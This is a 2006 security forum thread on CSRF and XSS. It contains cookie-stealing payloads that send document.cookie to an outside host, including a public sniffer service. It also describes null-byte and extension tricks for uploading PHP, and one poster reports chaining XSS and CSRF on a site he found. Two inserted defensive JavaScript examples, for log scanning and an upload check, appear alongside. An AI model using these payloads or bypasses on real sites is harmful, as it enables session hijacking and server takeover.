Sla.ckers.org
Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding etc.
New to CSRF, have an idea
Posted by: hasse
Date: December 12, 2006 06:25PM

Hello! I'm pretty new to this CSRF technique, but it looks like it has much potential. I just had an idea and I was just wondering if it's possible to do what I want.

Basically I create a site with an iframe pointing to a page I can't access, however an admin on that site can access the page. So I trick him to come to my page, the iframe loads the page I can't see, and the iframe is 0x0 pixels large. Now can I somehow extract the code or some information from that iframe from the page the iframe is created on (to basically save what my victim has loaded in the iframe)? (If the explanation's unclear please ask.)

This might not be possible at all but like I said I'm new to this. Either way I'd really appreciate a reply. :)

Re: New to CSRF, have an idea
Posted by: jungsonn
Date: December 12, 2006 10:01PM

Yes it's possible hasse.

But it would require one of the following:

* an XSS hole
* if you can upload an image, trick it into executing a server-side script.
* nullbyte exploit like: remote_image.jpg%00.php

If one of these is possible, you're on your way.



Edited 1 time(s). Last edit at 12/12/2006 10:01PM by jungsonn.

Re: New to CSRF, have an idea
Posted by: hasse
Date: December 12, 2006 10:38PM

jungsonn Wrote:
-------------------------------------------------------
> Yes it's possible hasse.
>
> But it would require one of the following:
>
> * an XSS hole
> * if you can upload an image, trick it into
> executing a server-side script.
> * nullbyte exploit like: remote_image.jpg%00.php
>
> If one of these is possible, you're on your way.


Ah, I see. I just thought that there'd be an easy way to "read" the iframe from its parent page. What if I do it with regular frames? Or just in general.

Say there's a section of a page only moderators can access. If I know the address to that page and I can trick a moderator to visit my specially prepared site while he's logged in, can I somehow use his rights to read the page and save it for me?

I think no known holes of the types you mention exist for the site(s) I got this idea from.



Edited 3 time(s). Last edit at 12/12/2006 10:41PM by hasse.

Re: New to CSRF, have an idea
Posted by: maluc
Date: December 12, 2006 11:07PM

Could probably find a hole, if the website is big enough. But you can only read contents in iframes if it's on the same domain as the page you opened it with. Can google/wiki "Same Origin Policy" for more info. Thus you have to be able to run javascript of your own, on the same domain as the target admin page.

However, if your admin uses IE you can read the page using the mhtml bug. Not too many admins use IE, so finding an XSS hole is usually the best bet.

-maluc

Re: New to CSRF, have an idea
Posted by: hasse
Date: December 13, 2006 01:52AM

maluc Wrote:
-------------------------------------------------------
> Could probably find a hole, if the website is big
> enough. But you can only read contents in iframes
> if it's on the same domain as the page you opened
> it with. Can google/wiki "Same Origin Policy" for
> more info. Thus you have to be able to run
> javascript of your own, on the same domain as the
> target admin page.
>
> However, if your admin uses IE you can read the
> page using the mhtml bug. Not too many admins use
> IE, so finding an XSS hole is usually the best
> bet.
>
> -maluc

Ok, I see. So it's made that way for security reasons, sounds pretty smart. Of course there might be an XSS hole but finding one in the latest vBulletin probably isn't easy. But this is mostly just a learning experience; I'm not dying to try it on some site.

Re: New to CSRF, have an idea
Posted by: maluc
Date: December 13, 2006 02:12AM

if i'm not mistaken.. i thought i remembered seeing one in Vbulletin last week at securityfocus.. *goes to check before posting*

ah, it's been two weeks .. and ew to their imageless site re-design. http://www.securityfocus.com/bid/21157 it affects up to version 3.6.3 (and maybe not below 3.6)

-maluc

Re: New to CSRF, have an idea
Posted by: hasse
Date: December 13, 2006 02:41AM

maluc Wrote:
-------------------------------------------------------
> if i'm not mistaken.. i thought i remembered
> seeing one in Vbulletin last week at
> securityfocus.. *goes to check before posting*
>
> ah, it's been two weeks .. and ew to their
> imageless site re-design.
> http://www.securityfocus.com/bid/21157 it affects
> up to version 3.6.3 (and maybe not below 3.6)
>
> -maluc

That looks good. I'll definitely look into that. :)



Edited 1 time(s). Last edit at 12/13/2006 02:41AM by hasse.

Re: New to CSRF, have an idea
Posted by: jungsonn
Date: December 13, 2006 06:27AM

Somewhere here on the board there is also an idea which had to do with a remote image (or avatar) which was forced to execute on the remote server as a .php file which could log cookies, if I remember, on a PHP forum board; it had to do with Apache mod_rewrite, which is an interesting issue.

But then the admin has to look at your picture you inserted into your forum profile, for instance. If he does the cookie will be retrieved, 'cause the image was "getted" as a PHP file, and you can find it back in your server logs.

Try to look it up, it's in here somewhere under CSRF

Anyway this is also possible.

Re: New to CSRF, have an idea
Posted by: WhiteAcid
Date: December 13, 2006 07:31AM

The thread you're talking about is http://sla.ckers.org/forum/read.php?4,260

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: New to CSRF, have an idea
Posted by: hasse
Date: December 13, 2006 02:28PM

WhiteAcid Wrote:
-------------------------------------------------------
> The thread you're talking about is
> http://sla.ckers.org/forum/read.php?4,260


Is that the thread? It doesn't seem to have anything to do with cookies.



Edited 3 time(s). Last edit at 12/13/2006 02:36PM by hasse.

Re: New to CSRF, have an idea
Posted by: jungsonn
Date: December 13, 2006 08:40PM

Yeah you are right, i thought it was in that thread also,
but it seems it's a new idea. 0_0

My idea was:

Using Apache mod_rewrite, an image to a PHP file.

then you link an image like:
<img src="site.com/image_bla'+document.cookie+'.jpg'" width=1 height=1>

In the server logs you "should" be able to see the getted image with the cookie embedded into the image file.

Don't know if it works, it was an idea.

EDIT: come to think about, the mod_rewrite isn't needed actually.
The image URI should be enough, 'cause in your server logs you should be able to see the getted image + cookie.

Can anyone confirm this?



Edited 1 time(s). Last edit at 12/13/2006 08:45PM by jungsonn.

Re: New to CSRF, have an idea
Posted by: hasse
Date: December 14, 2006 09:15AM

jungsonn Wrote:
-------------------------------------------------------
> Yeah you are right, i thought it was in that
> thread also,
> but it seems it's a new idea. 0_0
>
> My idea was:
>
> Using Apache mod_rewrite, an image to a PHP file.
>
> then you link an image like:
>
>
> In the server logs you "should" be able to see the
> getted image with the cookie embedded into the
> image file.
>
> Don't know if it works, it was an idea.
>
> EDIT: come to think about, the mod_rewrite isn't
> needed actually.
> The image URI should be enough, 'cause in your server
> logs you should be able to see the getted image +
> cookie.
>
> Can anyone confirm this?


You mean with JavaScript?
Like
<script>document.write('<img src="site.com/image_bla"'+document.cookie+'.jpg width=1 height=1>');</script>


The way I know of is to do:
<script>document.write('<img src="http://server.com/image.jpg?'+document.cookie+'">');</script>
For example this site:
http://antichat.ru
has a system for that anyone can use.

You just add this image with javascript:
http://antichat.ru/cgi-bin/s.jpg
and the cookies afterwards, like:

http://antichat.ru/cgi-bin/s.jpg?password=ad213bcde32
and then check the logs at
http://antichat.ru/sniff/log.php



Edited 3 time(s). Last edit at 12/14/2006 09:17AM by hasse.

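The image trick hasse and jungsonn describe leaves a visible trace on the server that receives the request: an image path fetched with a query string that carries cookie name=value pairs. As an added JavaScript example that is not code from the thread, this scans Apache combined-format access log lines for that pattern; the log lines, host names and cookie names are constructed for the example.

```javascript
// Added example, not from the thread: flag image requests whose query string
// looks like document.cookie (several name=value pairs joined by ';', or a
// session/credential-style name). Sample log lines are constructed.
const SAMPLE_LOG = [
  '203.0.113.5 - - [14/Dec/2006:09:15:02 +0100] "GET /cgi-bin/s.jpg HTTP/1.1" 200 43 "http://forum.example/" "Mozilla/4.0"',
  '203.0.113.9 - - [14/Dec/2006:09:15:07 +0100] "GET /cgi-bin/s.jpg?password=ad213bcde32;%20bbuserid=42 HTTP/1.1" 200 43 "http://forum.example/showthread.php" "Mozilla/5.0"',
  '198.51.100.7 - - [14/Dec/2006:09:16:11 +0100] "GET /cgi-bin/s.jpg?v=3 HTTP/1.1" 200 43 "-" "Mozilla/5.0"',
  '198.51.100.8 - - [14/Dec/2006:09:16:40 +0100] "GET /log.php?sid=9f2a HTTP/1.1" 200 43 "-" "Mozilla/5.0"',
];

// Apache "combined" format: ip ident user [time] "method target proto" status size "referer" "agent"
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;
const IMAGE_RE = /\.(jpe?g|gif|png)$/i;
// Cookie names that usually carry a session or credential.
const SENSITIVE_RE = /sess|sid|token|pass|auth|login|user/i;

function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Parse one combined-format line into its fields, or return null.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ip, time, method, target, status, referer, agent] = m;
  const q = target.indexOf('?');
  return {
    ip, time, method, status: Number(status), referer, agent,
    path: q < 0 ? target : target.slice(0, q),
    query: q < 0 ? '' : safeDecode(target.slice(q + 1)),
  };
}

// Names of the name=value pairs in "a=1; b=2"; text without '=' is not a pair.
function cookieNames(query) {
  return query.split(';').map(s => s.trim()).filter(s => s.includes('=')).map(s => s.split('=')[0]);
}

// Return the entries where an image request carries cookie-like data.
function findCookieLeaks(lines) {
  const hits = [];
  for (const line of lines) {
    const e = parseLine(line);
    if (!e || !IMAGE_RE.test(e.path) || !e.query) continue;
    const names = cookieNames(e.query);
    if (names.length >= 2 || names.some(n => SENSITIVE_RE.test(n))) {
      hits.push({ ip: e.ip, path: e.path, names, referer: e.referer });
    }
  }
  return hits;
}
```

The referer field in a hit tells you which page the injected tag was rendered on; cookies marked HttpOnly never reach document.cookie in the first place, which is the fix on the application side.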
Re: New to CSRF, have an idea
Posted by: jungsonn
Date: December 14, 2006 12:18PM

Not exactly, what i thought of was this:

RewriteEngine on
RewriteRule ^image\.jpg$ image.html [R]

I'm still busy with these ideas.

Re: New to CSRF, have an idea
Posted by: hasse
Date: December 14, 2006 04:49PM

jungsonn Wrote:
-------------------------------------------------------
> Not exactly, what i thought of was this:
>
> RewriteEngine on
> RewriteRule ^image\.jpg$ image.html
>
> I'm still busy with these ideas.


Ok, sounds good. :)

Re: New to CSRF, have an idea
Posted by: rsnake
Date: December 14, 2006 05:58PM

I can confirm that that does work Jungsonn... I have done similar things with other websites in the future (outputting dynamic images actually, but same idea). But the cookie part only works if you are on the same domain. So it's not really CSRF, but session riding and you have to have control over the server. So it's not 100% practical.

- RSnake
Gotta love it. http://ha.ckers.org

Re: New to CSRF, have an idea
Posted by: hasse
Date: December 14, 2006 07:10PM

rsnake Wrote:
-------------------------------------------------------
> I can confirm that that does work Jungsonn... I
> have done similar things with other websites in
> the future (outputting dynamic images actually,
> but same idea). But the cookie part only works if
> you are on the same domain. So it's not really
> CSRF, but session riding and you have to have
> control over the server. So it's not 100%
> practical.


I have to admit that I don't exactly get what he's trying to do, could you (or Jungsonn) maybe elaborate on that?

Re: New to CSRF, have an idea
Posted by: jungsonn
Date: December 15, 2006 12:18AM

Yeah well I wasn't paying much attention to the thread :) so I got a little mashed up in my head and started ranting :) So sorry for that.

But, ok the Apache thingy would work to force the server to interpret an image as a PHP file. Could come to use in some areas. The cookie idea wasn't practical and as RSnake mentioned this is limited to the same origin policy (I forget that once in a while while dreaming of exploits). Alas, but I had another idea which could work in some crazy manner. I tried to do it with PHP, the main idea that I had.
But that would require some XHRs to do the job. 'Cause you can XSS a site to force it to include a .js file as you know, in which you can initiate an XHR request to a PHP file which would log as much as you could dream of.

The other idea that I had was to bypass the filters (usually weak ones) to trick the script to accept your submitted "image". As seen with the NullByte injection you should be able to upload PHP files to the site you're on (if they have an upload function somewhere), like: C:\folder\image.jpg%00.php

If you could do it, in the PHP file you can do everything that you want.

So to elaborate on it, the idea was to rewrite the image to a PHP file to trick it to execute the PHP file when viewing the image. I haven't tested this, so it could be sooo wrong and stupid. Still, there remain other options. If the site allows XSS then there is a pretty good chance that the rest isn't filtered on the site either, which could possibly be exploited to trick the server to remotely include a PHP file (you know, the include exploit).

So all this is a bunch of loose talk, and not really a CSRF issue.

Re: New to CSRF, have an idea
Posted by: hasse
Date: December 15, 2006 10:15AM

> So all this is a bunch of loose talk, and not
> really a CSRF issue.


Well it sounds interesting nonetheless. :)

Re: New to CSRF, have an idea
Posted by: maluc
Date: December 15, 2006 12:43PM

The %00.php could work, if they use a file upload rather than direct linking. Web servers, at least Apache, don't attempt any file recognition by its contents, only the file extension. So if they only whitelist *.jpg/*.gif/*.png you're mostly outta luck. But, if there's some file upload that tries to blacklist *.php/*.pl/*.cgi/*.exe .. you can always try PHP's other extensions like .php5 .php4 .php3 or .htaccess perhaps

As for all the Apache stuff, i'm not sure where you plan to use that. If you have .htaccess/.conf write access on the target website, you already control it -.-

As for direct linking to remote images.. unless they open their image linking with <iframe> instead of <img> tags.. you're not gunna be able to do anything useful. I guess you could log visitors' IP, User Agent, and OS fingerprinting -_-

And XH requests ('XHR requests' is redundant ^^) can only request files on the same subdomain (test.com != www.test.com != evil.com) and using the same protocol (http != https != ftp) as the current page requesting it. So you're gunna have to use an iframe/img/script/etc tag to call evil.com/log.php

-maluc

Re: New to CSRF, have an idea
Posted by: jungsonn
Date: December 15, 2006 03:46PM

Yep, but the fun of nullbyte injection is that it breaks the filter which is trying to filter it :) It would be better to build your custom PHP shell to do these kinds of attacks, then you have much more room to play than in your little browser which is limited. I've found numerous cases where the nullbyte did break the filter (they had filtering) but it threw back errors and then it isn't useful either. Somehow I do think of combining several different attacks, think about a simultaneous SQL injection attack and an XSS exploit for parsing the SQL output. Still have to figure out how, but with a custom shell this would lead to very dangerous situations.

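A server-side upload check written from the defender's side, as an added JavaScript example that is not code from the thread: it rejects the null-byte name from above and the double-extension, .php5 and .htaccess cases maluc lists, and verifies the file's leading bytes instead of trusting the extension; the allow-list and magic bytes are assumptions for the example.

```javascript
// Added example, not from the thread: an upload check that closes the gaps
// discussed above: null-byte truncation ("remote_image.jpg%00.php"),
// blacklists that miss .php3/.php5, dotfiles such as .htaccess, and a server
// that serves by extension alone. Allow-list and magic bytes are assumed.
const ALLOWED = new Map([
  ['jpg', [0xff, 0xd8, 0xff]],        // JPEG start-of-image marker
  ['png', [0x89, 0x50, 0x4e, 0x47]],  // "\x89PNG"
  ['gif', [0x47, 0x49, 0x46, 0x38]],  // "GIF8"
]);

// Returns { ok: true, name } with a name safe to store, or { ok: false, reason }.
function checkUpload(rawName, bytes) {
  // Treat "%00" as NUL too: a C-based filter stops at the first NUL and may
  // see "image.jpg" while the file is written as "image.jpg\0.php".
  let name;
  try { name = decodeURIComponent(rawName); } catch (e) { return { ok: false, reason: 'bad encoding' }; }
  if (name.includes('\0')) return { ok: false, reason: 'null byte in name' };
  // Keep only the final path component (drops C:\folder\ or ../ prefixes).
  name = name.split(/[\\\/]/).pop();
  // Allow-list the whole form: one base, one extension, no leading dot,
  // so "image.jpg.php" and ".htaccess" never match.
  const m = /^([A-Za-z0-9_-]{1,64})\.([A-Za-z0-9]{1,5})$/.exec(name);
  if (!m) return { ok: false, reason: 'name not in allowed form' };
  const ext = m[2].toLowerCase();
  if (!ALLOWED.has(ext)) return { ok: false, reason: `extension .${ext} not allowed` };
  // Apache serves by extension, not content, so verify the magic bytes as
  // well: a PHP file renamed to .jpg fails here.
  const contentOk = ALLOWED.get(ext).every((b, i) => bytes[i] === b);
  if (!contentOk) return { ok: false, reason: 'content does not match extension' };
  return { ok: true, name: `${m[1]}.${ext}` };
}
```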
Re: New to CSRF, have an idea
Posted by: hasse
Date: December 19, 2006 02:21PM

Well I have been testing and playing around with CSRF and man this CSRF stuff is really great, and powerful! I just found a site that had a form, when I posted certain data in there I got an unsanitized error message, so the special data + an XSS-attack and an external site created to POST that and you're set.



Edited 2 time(s). Last edit at 12/19/2006 02:23PM by hasse.

Re: New to CSRF, have an idea
Posted by: rsnake
Date: December 19, 2006 03:08PM

Yup, CSRF is one of the largely overlooked issues on the Internet today. No one really thinks about it.

- RSnake
Gotta love it. http://ha.ckers.org

Re: New to CSRF, have an idea
Posted by: hasse
Date: December 20, 2006 12:04AM

rsnake Wrote:
-------------------------------------------------------
> Yup, CSRF is one of the largely overlooked issues
> on the Internet today. No one really thinks about
> it.


Yeah it's like an early christmas present to me. :)

Re: New to CSRF, have an idea
Posted by: rsnake
Date: December 20, 2006 10:33AM

Hahah... well Merry Christmas in that case!

- RSnake
Gotta love it. http://ha.ckers.org

Re: New to CSRF, have an idea
Posted by: jungsonn
Date: December 20, 2006 11:56AM

2 soon... 2 soon...

Re: New to CSRF, have an idea
Posted by: hasse
Date: December 20, 2006 12:29PM

rsnake Wrote:
-------------------------------------------------------
> Hahah... well Merry Christmas in that case!

Thanks! Merry christmas (or the equivalent) to everyone on this forum!
